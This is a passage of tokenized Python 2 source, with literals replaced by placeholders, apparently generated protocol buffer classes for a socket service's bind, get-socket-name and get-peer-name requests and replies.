ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_server_address ( ) <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_server_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . server_address_ . ByteSize ( ) ) <EOL> self . server_address_ . OutputUnchecked ( out ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_server_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . server_address_ . ByteSizePartial ( ) ) <EOL> self . server_address_ . OutputPartial ( out ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_server_address ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_server_address_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . server_address_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kserver_address = <NUM_LIT:3> <EOL> kproxy_external_ip = <NUM_LIT:4> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> <NUM_LIT:4> : "<STR_LIT>" , <EOL> } , <NUM_LIT:4> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:4> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:4> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class BindRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . proxy_external_ip_ = AddressPort ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def proxy_external_ip ( self ) : return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip_ <EOL> def clear_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:0> ; self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_proxy_external_ip_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> elif not self . proxy_external_ip_ . IsInitialized ( debug_strs ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n + <NUM_LIT:2> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> kproxy_external_ip = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class BindReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kproxy_external_ip = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetSocketNameRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetSocketNameReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_proxy_external_ip_ = <NUM_LIT:0> <EOL> proxy_external_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def proxy_external_ip ( self ) : <EOL> if self . proxy_external_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . proxy_external_ip_ is None : self . proxy_external_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . proxy_external_ip_ <EOL> def mutable_proxy_external_ip ( self ) : self . has_proxy_external_ip_ = <NUM_LIT:1> ; return self . proxy_external_ip ( ) <EOL> def clear_proxy_external_ip ( self ) : <EOL> if self . has_proxy_external_ip_ : <EOL> self . has_proxy_external_ip_ = <NUM_LIT:0> ; <EOL> if self . proxy_external_ip_ is not None : self . proxy_external_ip_ . Clear ( ) <EOL> def has_proxy_external_ip ( self ) : return self . has_proxy_external_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_proxy_external_ip ( ) ) : self . mutable_proxy_external_ip ( ) . MergeFrom ( x . proxy_external_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_proxy_external_ip_ != x . has_proxy_external_ip_ : return <NUM_LIT:0> <EOL> if self . has_proxy_external_ip_ and self . proxy_external_ip_ != x . proxy_external_ip_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_proxy_external_ip_ and not self . proxy_external_ip_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_proxy_external_ip_ ) : n += <NUM_LIT:1> + self . lengthString ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_proxy_external_ip ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSize ( ) ) <EOL> self . proxy_external_ip_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_proxy_external_ip_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . proxy_external_ip_ . ByteSizePartial ( ) ) <EOL> self . proxy_external_ip_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_proxy_external_ip ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_proxy_external_ip_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . proxy_external_ip_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> kproxy_external_ip = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetPeerNameRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> } , <NUM_LIT:1> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:1> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class GetPeerNameReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_peer_ip_ = <NUM_LIT:0> <EOL> peer_ip_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def peer_ip ( self ) : <EOL> if self . peer_ip_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . peer_ip_ is None : self . peer_ip_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . peer_ip_ <EOL> def mutable_peer_ip ( self ) : self . has_peer_ip_ = <NUM_LIT:1> ; return self . peer_ip ( ) <EOL> def clear_peer_ip ( self ) : <EOL> if self . has_peer_ip_ : <EOL> self . has_peer_ip_ = <NUM_LIT:0> ; <EOL> if self . peer_ip_ is not None : self . peer_ip_ . Clear ( ) <EOL> def has_peer_ip ( self ) : return self . has_peer_ip_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_peer_ip ( ) ) : self . mutable_peer_ip ( ) . MergeFrom ( x . peer_ip ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> 